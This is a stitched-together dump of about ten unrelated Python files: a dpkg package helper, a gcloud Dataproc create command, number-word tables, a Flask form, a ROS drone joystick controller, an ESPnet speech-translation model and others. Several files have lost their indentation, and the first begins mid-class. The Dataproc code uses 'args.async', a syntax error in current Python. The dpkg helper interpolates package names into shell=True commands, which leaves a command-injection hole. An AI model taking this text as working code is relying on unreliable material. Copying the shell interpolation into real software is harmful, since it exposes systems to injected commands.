"""Quickly set up a new request context for tests."""
return RequestContext(IN_MEM.resolved.test_profile())
def __repr__(self) -> str:
"""
Provide a human readable representation of this object.
Returns:
A human readable representation of this object
"""
skip = ()
items = (
"{}={}".format(k, repr(v))
for k, v in self.__dict__.items()
if k not in skip
)
return "<{}({})>".format(self.__class__.__name__, ", ".join(items))
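# Illustrative usage sketch (assumptions: the in-memory test profile is
# available and MessageReceipt() accepts no required arguments; not part of
# the original module):
#   ctx = RequestContext.test_context()
#   ctx.message_receipt = MessageReceipt()
#   settings = ctx.settings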
|
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
import os.path as path
from .native_package_base import native_package_base
from bes.common.string_util import string_util
from bes.common.string_list_util import string_list_util
from bes.system.execute import execute
# FIXME: this is ubuntu only
class native_package_linux(native_package_base):
def __init__(self, blurber = None):
super(native_package_linux, self).__init__(blurber)
@classmethod
def installed_packages(clazz):
    'Return a list of installed packages.'
cmd = 'dpkg -l'
rv = clazz._call_dpkg(cmd)
if rv.exit_code != 0:
raise RuntimeError('Failed to execute: %s' % (cmd))
lines = rv.stdout.strip().split('\n')
lines = [ l for l in lines if l.startswith('ii') ]
lines = [ string_util.split_by_white_space(l)[1] for l in lines ]
return sorted(lines)
_CONTENTS_BLACKLIST = [
'/.',
]
@classmethod
def package_contents(clazz, package_name):
    'Return the list of files and directories installed by a package.'
cmd = 'dpkg-query -L %s' % (package_name)
rv = clazz._call_dpkg(cmd)
if rv.exit_code != 0:
raise RuntimeError('Failed to execute: %s' % (cmd))
contents = rv.stdout.strip().split('\n')
contents = string_list_util.remove_if(contents, clazz._CONTENTS_BLACKLIST)
return sorted(contents)
@classmethod
def package_manifest(clazz, package_name):
    'Return the list of files installed by a package.'
contents = clazz.package_contents(package_name)
files = [ f for f in contents if path.isfile(f) ]
return files
@classmethod
def package_dirs(clazz, package_name):
    'Return the list of directories installed by a package.'
contents = clazz.package_contents(package_name)
files = [ f for f in contents if path.isdir(f) ]
return files
@classmethod
def package_info(clazz, package_name):
'Return platform specific information about a package.'
assert False
@classmethod
def is_installed(clazz, package_name):
'Return True if native_package is installed.'
cmd = 'dpkg -l %s' % (package_name)
rv = clazz._call_dpkg(cmd)
return rv.exit_code == 0
@classmethod
def owner(clazz, filename):
'Return the package that owns filename.'
cmd = 'dpkg -S %s' % (filename)
rv = clazz._call_dpkg(cmd)
if rv.exit_code != 0:
return None
return rv.stdout.split(':')[0].strip()
@classmethod
def _call_dpkg(clazz, cmd):
'Call dpkg.'
return execute.execute(cmd, raise_error = False, shell = True)
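# Illustrative usage on a Debian/Ubuntu host (not part of the original
# module):
#   npkg = native_package_linux()
#   print(npkg.is_installed('bash'))
#   print(npkg.owner('/bin/bash'))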
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Create cluster command."""
from googlecloudsdk.api_lib.dataproc import compute_helpers
from googlecloudsdk.api_lib.dataproc import constants
from googlecloudsdk.api_lib.dataproc import dataproc as dp
from googlecloudsdk.api_lib.dataproc import util
from googlecloudsdk.calliope import actions
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.command_lib.dataproc import clusters
from googlecloudsdk.command_lib.dataproc import flags
from googlecloudsdk.command_lib.util.args import labels_util
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
def _CommonArgs(parser, beta=False):
"""Register flags common to all tracks."""
base.ASYNC_FLAG.AddToParser(parser)
parser.add_argument('name', help='The name of this cluster.')
clusters.ArgsForClusterRef(parser, beta)
@base.ReleaseTracks(base.ReleaseTrack.GA)
class Create(base.CreateCommand):
"""Create a cluster."""
detailed_help = {
'EXAMPLES': """\
To create a cluster, run:
$ {command} my_cluster
"""
}
@staticmethod
def Args(parser):
_CommonArgs(parser, beta=False)
parser.add_argument(
'--zone',
'-z',
help='The compute zone (e.g. us-central1-a) for the cluster.',
action=actions.StoreProperty(properties.VALUES.compute.zone))
@staticmethod
def ValidateArgs(args):
if args.single_node:
# --num-workers and --num-preemptible-workers must be None (unspecified)
# or 0
if args.num_workers:
raise exceptions.ConflictingArgumentsException(
'--single-node', '--num-workers')
if args.num_preemptible_workers:
raise exceptions.ConflictingArgumentsException(
'--single-node', '--num-preemptible-workers')
if constants.ALLOW_ZERO_WORKERS_PROPERTY in args.properties:
raise exceptions.InvalidArgumentException(
'--properties',
'Instead of %s, use gcloud beta dataproc clusters create '
'--single-node to deploy single node clusters' %
constants.ALLOW_ZERO_WORKERS_PROPERTY)
def Run(self, args):
self.ValidateArgs(args)
dataproc = dp.Dataproc(self.ReleaseTrack())
cluster_ref = util.ParseCluster(args.name, dataproc)
compute_resources = compute_helpers.GetComputeResources(
self.ReleaseTrack(), args.name)
beta = self.ReleaseTrack() == base.ReleaseTrack.BETA
cluster_config = clusters.GetClusterConfig(
args, dataproc, cluster_ref.projectId, compute_resources, beta)
cluster = dataproc.messages.Cluster(
config=cluster_config,
clusterName=cluster_ref.clusterName,
projectId=cluster_ref.projectId)
self.ConfigureCluster(dataproc.messages, args, cluster)
operation = dataproc.client.projects_regions_clusters.Create(
dataproc.messages.DataprocProjectsRegionsClustersCreateRequest(
projectId=cluster_ref.projectId,
region=cluster_ref.region,
cluster=cluster))
if args.async:
log.status.write(
'Creating [{0}] with operation [{1}].'.format(
cluster_ref, operation.name))
return
operation = util.WaitForOperation(
dataproc,
operation,
message='Waiting for cluster creation operation',
timeout_s=args.timeout)
get_request = dataproc.messages.DataprocProjectsRegionsClustersGetRequest(
projectId=cluster_ref.projectId,
region=cluster_ref.region,
clusterName=cluster_ref.clusterName)
cluster = dataproc.client.projects_regions_clusters.Get(get_request)
if cluster.status.state == (
dataproc.messages.ClusterStatus.StateValueValuesEnum.RUNNING):
zone_uri = cluster.config.gceClusterConfig.zoneUri
zone_short_name = zone_uri.split('/')[-1]
# Log the URL of the cluster
log.CreatedResource(
cluster_ref,
# Also indicate which zone the cluster was placed in. This is helpful
# if the server picked a zone (auto zone)
details='Cluster placed in zone [{0}]'.format(zone_short_name))
else:
log.error('Create cluster failed!')
if operation.details:
log.error('Details:\n' + operation.details)
return cluster
@staticmethod
def ConfigureCluster(messages, args, cluster):
"""Performs any additional configuration of the cluster."""
cluster.labels = labels_util.ParseCreateArgs(args,
messages.Cluster.LabelsValue)
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class CreateBeta(Create):
"""Create a cluster."""
@staticmethod
def Args(parser):
_CommonArgs(parser, beta=True)
flags.AddMinCpuPlatformArgs(parser, base.ReleaseTrack.BETA)
parser.add_argument(
'--zone',
'-z',
help="""
The compute zone (e.g. us-central1-a) for the cluster. If empty,
and --region is set to a value other than 'global', the server will
pick a zone in the region.
""",
action=actions.StoreProperty(properties.VALUES.compute.zone))
parser.add_argument(
'--max-idle',
type=arg_parsers.Duration(),
help="""\
The duration before cluster is auto-deleted after last job completes,
such as "2h" or "1d".
See $ gcloud topic datetimes for information on duration formats.
""")
auto_delete_group = parser.add_mutually_exclusive_group()
auto_delete_group.add_argument(
'--max-age',
type=arg_parsers.Duration(),
help="""\
The lifespan of the cluster before it is auto-deleted, such as
"2h" or "1d".
See $ gcloud topic datetimes for information on duration formats.
""")
auto_delete_group.add_argument(
'--expiration-time',
type=arg_parsers.Datetime.Parse,
help="""\
The time when cluster will be auto-deleted, such as
"2017-08-29T18:52:51.142Z". See $ gcloud topic datetimes for
information on time formats.
""")
for instance_type in ('master', 'worker'):
help_msg = """\
Attaches accelerators (e.g. GPUs) to the {instance_type}
instance(s).
""".format(instance_type=instance_type)
if instance_type == 'worker':
help_msg += """
Note:
No accelerators will be attached to preemptible workers, because
preemptible VMs do not support accelerators.
"""
help_msg += """
*type*::: The specific type (e.g. nvidia-tesla-k80 for nVidia Tesla
K80) of accelerator to attach to the instances. Use 'gcloud compute
accelerator-types list' to learn about all available accelerator
types.
*count*::: The number of pieces of the accelerator to attach to each
of the instances. The default value is 1.
"""
parser.add_argument(
'--{0}-accelerator'.format(instance_type),
type=arg_parsers.ArgDict(spec={
'type': str,
'count': int,
}),
metavar='type=TYPE,[count=COUNT]',
help=help_msg)
@staticmethod
def ValidateArgs(args):
super(CreateBeta, CreateBeta).ValidateArgs(args)
if args.master_accelerator and 'type' not in args.master_accelerator:
raise exceptions.InvalidArgumentException(
'--master-accelerator', 'accelerator type must be specified. '
'e.g. --master-accelerator type=nvidia-tesla-k80,count=2')
if args.worker_accelerator and 'type' not in args.worker_accelerator:
raise exceptions.InvalidArgumentException(
'--worker-accelerator', 'accelerator type must be specified. '
'e.g. --worker-accelerator type=nvidia-tesla-k80,count=2')
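# Illustrative sketch (not part of the Cloud SDK): the --*-accelerator flags
# above rely on arg_parsers.ArgDict to turn "type=TYPE,count=COUNT" into a
# dict, and ValidateArgs() rejects dicts that lack a 'type' key. The helper
# below is a hypothetical plain-argparse mimic of that behaviour.
def _parse_accelerator_demo(value):
  """Parse 'type=TYPE,count=COUNT' into {'type': str, 'count': int}."""
  import argparse
  spec = {'type': str, 'count': int}
  result = {}
  for item in value.split(','):
    key, _, val = item.partition('=')
    if key not in spec:
      raise argparse.ArgumentTypeError('unknown key: {0}'.format(key))
    result[key] = spec[key](val)
  return result

if __name__ == '__main__':
  parsed = _parse_accelerator_demo('type=nvidia-tesla-k80,count=2')
  assert parsed == {'type': 'nvidia-tesla-k80', 'count': 2}
  # Mirrors ValidateArgs(): an accelerator spec without 'type' is invalid.
  assert 'type' in parsed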
|
#This file is part of numword. The COPYRIGHT file at the top level of
#this repository contains the full copyright notices and license terms.
'''
numword for EU
'''
from .numword_base import NumWordBase
class NumWordEU(NumWordBase):
'''
NumWord EU
'''
def _set_high_numwords(self, high):
'''
Set high num words
'''
max_val = 3 + 6 * len(high)
for word, i in zip(high, list(range(max_val, 3, -6))):
self.cards[10 ** i] = word + "illiard"
self.cards[10 ** (i - 3)] = word + "illion"
def _base_setup(self):
'''
Base setup
'''
lows = [
"non",
"oct",
"sept",
"sext",
"quint",
"quadr",
"tr",
"b",
"m",
]
units = [
"",
"un",
"duo",
"tre",
"quattuor",
"quin",
"sex",
"sept",
"octo",
"novem",
]
tens = [
"dec",
"vigint",
"trigint",
"quadragint",
"quinquagint",
"sexagint",
"septuagint",
"octogint",
"nonagint",
]
self.high_numwords = (["cent"]
+ self._gen_high_numwords(units, tens, lows))
def currency(self, value, longval=True, jointxt="", hightxt="Euro/s",
lowtxt="Euro cent/s", space=True):
'''
Convert to currency
'''
return self._split(value, hightxt=hightxt, lowtxt=lowtxt,
jointxt=jointxt, longval=longval, space=space)
    def _merge(self, curr, next):
        '''
        Merge two adjacent number words; implemented by language-specific subclasses
        '''
        raise NotImplementedError
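# Illustrative sketch (standalone): how _set_high_numwords() above maps
# powers of ten to long-scale names, e.g. with high = ["b", "m"]:
# 10**15 -> "billiard", 10**12 -> "billion", 10**9 -> "milliard",
# 10**6 -> "million".
def _demo_high_numwords(high):
    cards = {}
    max_val = 3 + 6 * len(high)
    for word, i in zip(high, list(range(max_val, 3, -6))):
        cards[10 ** i] = word + "illiard"
        cards[10 ** (i - 3)] = word + "illion"
    return cards

assert _demo_high_numwords(["b", "m"]) == {
    10 ** 15: "billiard", 10 ** 12: "billion",
    10 ** 9: "milliard", 10 ** 6: "million",
}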
|
from .meter import Meter
class Monitor(Meter):
def __init__(self, *args, **kwargs):
super(Monitor, self).__init__(*args, **kwargs)
def monitor(self, rms):
"""Extra monitor actions with RMS values
Custom trigger conditions and actions can be written here as long as
`action=None` is passed to the Monitor(). The Monitor instance will
only execute monitor() as action is disabled.
"""
pass
    # The following hooks can be used as long as
    # `action=None` is passed to the Monitor()
def prepopen(self):
"""Extra code before executing the script"""
pass
def postpopen(self):
"""Extra code after executing the script"""
pass
# The following hooks can be used in all cases
def prestop(self):
"""Extra code before stop"""
pass
def poststop(self):
"""Extra code after stop"""
pass
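# Illustrative sketch: a Monitor subclass using the hooks above. The
# constructor arguments inherited from Meter are not shown here; the point
# is that monitor() only fires when the instance is created with action=None.
class ClippingMonitor(Monitor):
    CLIP_RMS = 0.9  # hypothetical threshold

    def monitor(self, rms):
        # custom trigger condition: warn when the signal is close to clipping
        if rms >= self.CLIP_RMS:
            print('warning: RMS %.2f near clipping' % rms)

    def prestop(self):
        print('stopping monitor')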
|
# 2.6 Last digit of the sum of Fibonacci numbers F_0..F_n.
# Uses the identity sum(F_0..F_n) = F_{n+2} - 1 and the fact that the last
# digits of Fibonacci numbers repeat with Pisano period 60 (mod 10).
n = int(input())
if n <= 1:
    print(n)
    quit()
lesser = (n + 2) % 60
if lesser == 1:
    # F_1 = 1, so the answer is 1 - 1 = 0
    print(0)
    quit()
elif lesser == 0:
    # F_60 ends in 0, so the answer is (0 - 1) mod 10 = 9
    print(9)
    quit()
def fibo(k):
    # last digit of F_k - 1, for k >= 2 (k == 0 and k == 1 were handled above)
    a, b = 0, 1
    for _ in range(2, k + 1):
        c = (a + b) % 10
        b, a = c, b
    if c != 0:
        print(c - 1)
    else:
        print(9)

fibo(lesser)
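# Equivalent pure function for testing, using the same identity as above:
# sum(F_0..F_n) = F_{n+2} - 1 and F_k mod 10 has Pisano period 60.
def last_digit_fib_sum(n):
    k = (n + 2) % 60
    a, b = 0, 1
    for _ in range(k):
        a, b = b, (a + b) % 10
    return (a - 1) % 10  # a == F_k mod 10; also covers the k == 0 and k == 1 cases

assert last_digit_fib_sum(3) == 4   # 0 + 1 + 1 + 2 = 4
assert last_digit_fib_sum(10) == 3  # sum of F_0..F_10 = 143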
|
from uuid import uuid4
from django.utils.text import camel_case_to_spaces
from git_orm.models.fields import TextField, CreatedAtField, UpdatedAtField
from django.db.models.options import Options as DjangoOptions
class Options(DjangoOptions):
def __init__(self, meta, app_label=None):
super(Options, self).__init__(meta, app_label)
self.fields = []
self.storage_name = None
self.json_db_name = None
self.has_custom_queryset = False
self.managed = False
def contribute_to_class(self, cls, name):
setattr(cls, name, self)
self.model = cls
self.object_name = cls.__name__
self.model_name = self.object_name.lower()
self.verbose_name = camel_case_to_spaces(self.object_name)
self.storage_name = cls.__name__.lower() + 's'
self.original_attrs = {}
if self.meta:
if hasattr(self.meta, 'storage_name'):
self.storage_name = self.meta.storage_name
if hasattr(self.meta, 'json_db_name'):
self.json_db_name = self.meta.json_db_name
if hasattr(self.meta, 'ordering'):
self.ordering = list(self.meta.ordering)
def add_field(self, field, virtual=False):
self.fields.append(field)
if not self.pk and field.primary_key:
self.pk = field
def get_field(self, name):
for f in self.fields:
if f.name == name:
return f
raise KeyError(
'{} has no field named {}'.format(self.model.__name__, name))
@property
def writable_fields(self):
return [f for f in self.fields if f.attname]
    def _prepare(self):
        if not self.pk:
            id_field = TextField(
                primary_key=True, default=lambda: uuid4().hex, auto_created=True)
            self.model.add_to_class('id', id_field)
            # add_to_class appends the new field; move the id field to the front
            self.fields.insert(0, self.fields.pop())
fieldnames = [f.name for f in self.fields]
        if 'created_at' not in fieldnames:
            self.model.add_to_class('created_at', CreatedAtField())
        if 'updated_at' not in fieldnames:
            self.model.add_to_class('updated_at', UpdatedAtField())
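# Illustrative sketch (standalone, no git_orm imports needed): the Meta
# handling above in miniature. The Ticket model and its Meta are hypothetical.
class _DemoOptions:
    def __init__(self, meta):
        self.meta = meta

    def contribute_to_class(self, cls, name):
        setattr(cls, name, self)
        self.object_name = cls.__name__
        self.model_name = self.object_name.lower()
        self.storage_name = cls.__name__.lower() + 's'  # default: 'tickets'
        if self.meta and hasattr(self.meta, 'storage_name'):
            self.storage_name = self.meta.storage_name   # Meta override wins

class Ticket:
    class Meta:
        storage_name = 'issues'

_opts = _DemoOptions(Ticket.Meta)
_opts.contribute_to_class(Ticket, '_meta')
assert Ticket._meta.model_name == 'ticket'
assert Ticket._meta.storage_name == 'issues'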
|
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms.validators import DataRequired
class MyForm(FlaskForm):
name = StringField('Enter Text:', validators=[DataRequired()])
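# Illustrative usage sketch: wiring MyForm into a view. The app setup and
# template name are assumptions; FlaskForm needs a SECRET_KEY for CSRF.
from flask import Flask, redirect, render_template, url_for

app = Flask(__name__)
app.config['SECRET_KEY'] = 'change-me'

@app.route('/submit', methods=['GET', 'POST'])
def submit():
    form = MyForm()
    if form.validate_on_submit():  # POST with a non-empty name field
        return redirect(url_for('submit'))
    return render_template('submit.html', form=form)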
|
#!/usr/bin/env python
__author__ = 'broecker'
import rospy
from sensor_msgs.msg import Joy
from geometry_msgs.msg import Twist
from std_srvs.srv import Empty
from sl_crazyflie_srvs.srv import ChangeTargetPose, ChangeTargetPoseRequest, StartWanding
import math
RATE = 50
TIME_OUT = 0.5
CONTROLLER_RP_THRESH = 0.2
UP = 12
DOWN = 14
FORWARD = 4
BACKWARD = 6
LEFT = 7
RIGHT = 5
TAKEOFF = 3
STEP_SIZE = 0.15
WANDING = 0
class MocapController:
def __init__(self):
self.pid_active_button = rospy.get_param("~pid_activate_axis", 11)
self.pid_active = False
self.position_control_active = False
self.cmd_vel_teleop = Twist()
self.cmd_vel_pid = Twist()
self.pid_received = False
self.teleop_received = False
self.pid_last_time = None
self.teleop_last_time = None
self.wanding = False
self.prev_pressed = {'takeoff': False, 'up': False, 'down': False, 'left': False, 'right': False, 'forward': False, 'backward': False, 'wanding': False}
self.hover_stop_srv = rospy.ServiceProxy('hover/stop', Empty)
self.hold_position_start_srv = rospy.ServiceProxy('hover/start_hold_position', Empty)
self.change_target_pose_srv = rospy.ServiceProxy('hover/change_target_pose', ChangeTargetPose)
self.toggle_position_control_srv = rospy.ServiceProxy('hover/toggle_position_control', Empty)
self.start_wanding_srv = rospy.ServiceProxy('hover/start_wanding', StartWanding)
self.stop_wanding_srv = rospy.ServiceProxy('hover/stop_wanding', Empty)
self.cmd_pub = rospy.Publisher('cmd_vel', Twist, queue_size=1)
self.joy_subscriber_ = rospy.Subscriber("joy", Joy, self.joy_callback)
self.velocity_subscriber_teleop = rospy.Subscriber("teleop/cmd_vel", Twist, self.cmd_vel_callback_teleop)
self.velocity_subscriber_pid = rospy.Subscriber("hover/cmd_vel", Twist, self.cmd_vel_callback_pid)
def spin(self):
r = rospy.Rate(RATE)
while not self.teleop_received:
r.sleep()
while not rospy.is_shutdown():
cur_time = rospy.Time.now()
twist = self.cmd_vel_teleop
if (self.pid_active or self.position_control_active) and self.pid_received:
if (cur_time - self.pid_last_time).to_sec() < TIME_OUT:
twist.linear.z = self.cmd_vel_pid.linear.z
if abs(twist.linear.y) < CONTROLLER_RP_THRESH:
twist.linear.y = self.cmd_vel_pid.linear.y
if abs(twist.linear.x) < CONTROLLER_RP_THRESH:
twist.linear.x = self.cmd_vel_pid.linear.x
else:
twist = Twist()
else:
if (cur_time - self.teleop_last_time).to_sec() > TIME_OUT:
twist = Twist()
self.cmd_pub.publish(twist)
r.sleep()
def joy_callback(self, joy_msgs):
        if joy_msgs.buttons[self.pid_active_button] != 0:
if not self.pid_active:
self.hold_position_start_srv()
self.pid_active = True
else:
if self.pid_active:
self.hover_stop_srv()
self.pid_active = False
if self.is_button_released('takeoff', joy_msgs.buttons[TAKEOFF]):
            self.toggle_position_control_srv()
            self.position_control_active = not self.position_control_active
req = ChangeTargetPoseRequest()
if self.is_button_released('up', joy_msgs.buttons[UP]):
req.pose.position.z = STEP_SIZE
if self.is_button_released('down', joy_msgs.buttons[DOWN]):
req.pose.position.z = -STEP_SIZE
if self.is_button_released('left', joy_msgs.buttons[LEFT]):
req.pose.position.y = STEP_SIZE
if self.is_button_released('right', joy_msgs.buttons[RIGHT]):
req.pose.position.y = -STEP_SIZE
if self.is_button_released('forward', joy_msgs.buttons[FORWARD]):
req.pose.position.x = STEP_SIZE
if self.is_button_released('backward', joy_msgs.buttons[BACKWARD]):
req.pose.position.x = -STEP_SIZE
pose = req.pose.position
        if pose.x != 0 or pose.y != 0 or pose.z != 0:
self.change_target_pose_srv(req)
if self.is_button_released('wanding', joy_msgs.buttons[WANDING]):
if self.wanding:
self.stop_wanding_srv()
self.wanding = False
else:
res = self.start_wanding_srv()
self.wanding = res.success
def is_button_released(self, button_name, button_pressed):
if button_pressed:
self.prev_pressed[button_name] = True
elif self.prev_pressed[button_name]:
self.prev_pressed[button_name] = False
return True
return False
def cmd_vel_callback_teleop(self, twist):
self.cmd_vel_teleop = twist
self.teleop_received = True
self.teleop_last_time = rospy.Time.now()
def cmd_vel_callback_pid(self, twist):
self.cmd_vel_pid = twist
self.pid_received = True
self.pid_last_time = rospy.Time.now()
if __name__ == '__main__':
rospy.init_node("mocap_telecop")
cont = MocapController()
cont.spin()
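# Illustrative sketch (no ROS needed): the press/release edge detection that
# is_button_released() implements. Each press fires exactly once, on release.
def _demo_edge_detection():
    prev = False
    events = []
    for pressed in [0, 1, 1, 0, 0, 1, 0]:  # sampled button states
        if pressed:
            prev = True
            events.append(False)
        elif prev:
            prev = False
            events.append(True)   # falling edge -> command fires
        else:
            events.append(False)
    assert events == [False, False, False, True, False, False, True]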
|
"""
Modified by Hang Le
The original copyright is appended below
--
Copyright 2019 Kyoto University (Hirofumi Inaguma)
Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""
"""Transformer model for joint ASR and multilingual ST"""
import logging
import math
import numpy as np
import six
import time
from argparse import Namespace
from distutils.util import strtobool
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from espnet.nets.pytorch_backend.ctc import CTC
from espnet.nets.pytorch_backend.e2e_asr import CTC_LOSS_THRESHOLD
from espnet.nets.pytorch_backend.e2e_st import Reporter
from espnet.nets.pytorch_backend.e2e_mt import Reporter as MTReporter
from espnet.nets.pytorch_backend.nets_utils import (
get_subsample,
make_pad_mask, pad_list,
th_accuracy,
to_device
)
from espnet.nets.pytorch_backend.transformer.add_sos_eos import add_sos_eos
from espnet.nets.pytorch_backend.transformer.attention import MultiHeadedAttention
from espnet.nets.pytorch_backend.transformer.decoder import Decoder
from espnet.nets.pytorch_backend.transformer.encoder import Encoder
from espnet.nets.pytorch_backend.transformer.initializer import initialize
from espnet.nets.pytorch_backend.transformer.label_smoothing_loss import LabelSmoothingLoss
from espnet.nets.pytorch_backend.transformer.mask import (
subsequent_mask, create_cross_mask, target_mask
)
from espnet.nets.pytorch_backend.transformer.plot import PlotAttentionReport
from espnet.nets.st_interface import STInterface
from espnet.nets.e2e_asr_common import end_detect
def Embedding(num_embeddings, embedding_dim, padding_idx):
m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx)
nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5)
nn.init.constant_(m.weight[padding_idx], 0)
return m
def build_embedding(dictionary, embed_dim, padding_idx=0):
num_embeddings = max(list(dictionary.values())) + 1
emb = Embedding(num_embeddings, embed_dim, padding_idx=padding_idx)
return emb
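# Illustrative sketch: build_embedding() sizes the table from the largest
# token id in the dictionary and zeroes the padding row (toy values below;
# call manually to check).
def _demo_build_embedding():
    toy_dict = {'<pad>': 0, 'hello': 1, 'world': 2}
    emb = build_embedding(toy_dict, embed_dim=8, padding_idx=0)
    assert emb.weight.shape == (3, 8)               # max id 2 -> 3 rows
    assert float(emb.weight[0].abs().sum()) == 0.0  # padding row is zeroed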
class E2E(STInterface, torch.nn.Module):
"""E2E module.
:param int idim: dimension of inputs
    :param int odim_tgt: dimension of target-language outputs
    :param int odim_src: dimension of source-language outputs
:param Namespace args: argument Namespace containing options
"""
@staticmethod
def add_arguments(parser):
"""Add arguments."""
group = parser.add_argument_group("transformer model setting")
group.add_argument("--transformer-init", type=str, default="pytorch",
choices=["pytorch", "xavier_uniform", "xavier_normal",
"kaiming_uniform", "kaiming_normal"],
help='how to initialize transformer parameters')
group.add_argument("--transformer-input-layer", type=str, default="conv2d",
choices=["conv2d", "linear", "embed"],
help='transformer input layer type')
group.add_argument('--transformer-attn-dropout-rate',
default=None, type=float,
help='dropout in transformer attention. \
Use --dropout-rate if None is set')
group.add_argument('--transformer-lr', default=10.0, type=float,
help='Initial value of learning rate')
group.add_argument('--transformer-warmup-steps', default=25000, type=int,
help='optimizer warmup steps')
group.add_argument('--transformer-length-normalized-loss',
default=True, type=strtobool,
help='normalize loss by length')
group.add_argument('--dropout-rate', default=0.0, type=float,
help='Dropout rate for the encoder')
# Encoder
group.add_argument('--elayers', default=4, type=int,
help='Number of encoder layers \
(for shared recognition part in multi-speaker asr mode)')
group.add_argument('--eunits', '-u', default=300, type=int,
help='Number of encoder hidden units')
# Attention
group.add_argument('--adim', default=320, type=int,
help='Number of attention transformation dimensions')
group.add_argument('--aheads', default=4, type=int,
help='Number of heads for multi head attention')
# Decoder
group.add_argument('--dlayers', default=1, type=int,
help='Number of decoder layers')
group.add_argument('--dunits', default=320, type=int,
help='Number of decoder hidden units')
# Adapters
        group.add_argument('--adapter-reduction-factor', default=None, type=float,
                           help='Reduction factor in the bottleneck of adapter modules for the decoder')
        group.add_argument('--adapter-reduction-factor-enc', default=None, type=float,
                           help='Reduction factor in the bottleneck of adapter modules for the encoder')
group.add_argument('--adapter-before-src-attn', default=False, type=strtobool,
help='Add adapter before src attn module in decoder')
group.add_argument('--adapter-after-mha', default=False, type=strtobool,
help='Add adapter after multi-head attention')
group.add_argument('--use-shared-adapters', default=False, type=strtobool,
help='Shared adapters')
group.add_argument('--use-shared-adapters-enc', default=False, type=strtobool,
help='Shared adapters for encoder')
return parser
@property
def attention_plot_class(self):
"""Return PlotAttentionReport."""
return PlotAttentionReport
def __init__(self, idim, odim_tgt, odim_src, args, ignore_id=-1):
"""Construct an E2E object.
:param int idim: dimension of inputs
        :param int odim_tgt: dimension of target-language outputs
        :param int odim_src: dimension of source-language outputs
:param Namespace args: argument Namespace containing options
"""
torch.nn.Module.__init__(self)
if args.transformer_attn_dropout_rate is None:
args.transformer_attn_dropout_rate = args.dropout_rate
# special tokens and model dimensions
self.pad = 0
self.sos_tgt = odim_tgt - 1
self.eos_tgt = odim_tgt - 1
self.sos_src = odim_src - 1
self.eos_src = odim_src - 1
self.odim_tgt = odim_tgt
self.odim_src = odim_src
self.idim = idim
self.adim = args.adim
self.ignore_id = ignore_id
# submodule
self.mtlalpha = getattr(args, "mtlalpha", 0.0)
self.asr_weight = getattr(args, "asr_weight", 0.0)
self.mt_weight = getattr(args, "mt_weight", 0.0)
self.num_decoders = getattr(args, "num_decoders", 2)
self.do_st = getattr(args, "do_st", True)
self.do_mt = getattr(args, "do_mt", self.mt_weight > 0.0)
self.do_asr = self.asr_weight > 0 and self.mtlalpha < 1
# cross-attention parameters
self.cross_weight = getattr(args, "cross_weight", 0.0)
self.cross_self = getattr(args, "cross_self", False)
self.cross_src = getattr(args, "cross_src", False)
self.cross_operator = getattr(args, "cross_operator", None)
self.cross_to_asr = getattr(args, "cross_to_asr", False)
self.cross_to_st = getattr(args, "cross_to_st", False)
self.wait_k_asr = getattr(args, "wait_k_asr", 0)
self.wait_k_st = getattr(args, "wait_k_st", 0)
self.cross_src_from = getattr(args, "cross_src_from", "embedding")
self.cross_self_from = getattr(args, "cross_self_from", "embedding")
self.cross_shared = getattr(args, "cross_shared", False)
self.cross_weight_learnable = getattr(args, "cross_weight_learnable", False)
# one-to-many models parameters
self.use_joint_dict = getattr(args, "use_joint_dict", True)
self.one_to_many = getattr(args, "one_to_many", False)
self.use_lid = getattr(args, "use_lid", False)
if self.use_joint_dict:
self.langs_dict = getattr(args, "langs_dict_tgt", None)
self.lang_tok = getattr(args, "lang_tok", None)
self.lang_tok_mt = getattr(args, "lang_tok_mt", None)
self.subsample = get_subsample(args,
mode='mt' if self.do_mt else 'st',
arch='transformer')
self.reporter = MTReporter() if self.do_mt else Reporter()
self.normalize_before = getattr(args, "normalize_before", True)
        # Backward compatibility
if self.cross_operator in ["sum", "concat"]:
if self.cross_self and self.cross_src:
self.cross_operator = "self_src" + self.cross_operator
elif self.cross_self:
self.cross_operator = "self_" + self.cross_operator
elif self.cross_src:
self.cross_operator = "src_" + self.cross_operator
if self.cross_operator:
assert self.cross_operator in ['self_sum', 'self_concat', 'src_sum',
'src_concat', 'self_src_sum', 'self_src_concat']
# Check parameters
if self.one_to_many:
self.use_lid = True
if not self.do_st:
assert (not self.cross_to_asr) and (not self.cross_to_st)
if self.cross_operator and 'sum' in self.cross_operator and self.cross_weight <= 0:
assert (not self.cross_to_asr) and (not self.cross_to_st)
if self.cross_to_asr or self.cross_to_st:
assert self.do_st and self.do_asr
assert self.cross_self or self.cross_src
assert bool(self.cross_operator) == (self.do_asr and (self.cross_to_asr or self.cross_to_st))
if self.cross_src_from != "embedding" or self.cross_self_from != "embedding":
assert self.normalize_before
if self.wait_k_asr > 0:
assert self.wait_k_st == 0
elif self.wait_k_st > 0:
assert self.wait_k_asr == 0
else:
assert self.wait_k_asr == 0
assert self.wait_k_st == 0
logging.info("*** Cross attention parameters ***")
if self.cross_to_asr:
logging.info("| Cross to ASR")
if self.cross_to_st:
logging.info("| Cross to ST")
if self.cross_self:
logging.info("| Cross at Self")
if self.cross_src:
logging.info("| Cross at Source")
if self.cross_to_asr or self.cross_to_st:
logging.info(f'| Cross operator: {self.cross_operator}')
logging.info(f'| Cross sum weight: {self.cross_weight}')
if self.cross_src:
logging.info(f'| Cross source from: {self.cross_src_from}')
if self.cross_self:
logging.info(f'| Cross self from: {self.cross_self_from}')
logging.info(f"Use joint dictionary: {self.use_joint_dict}")
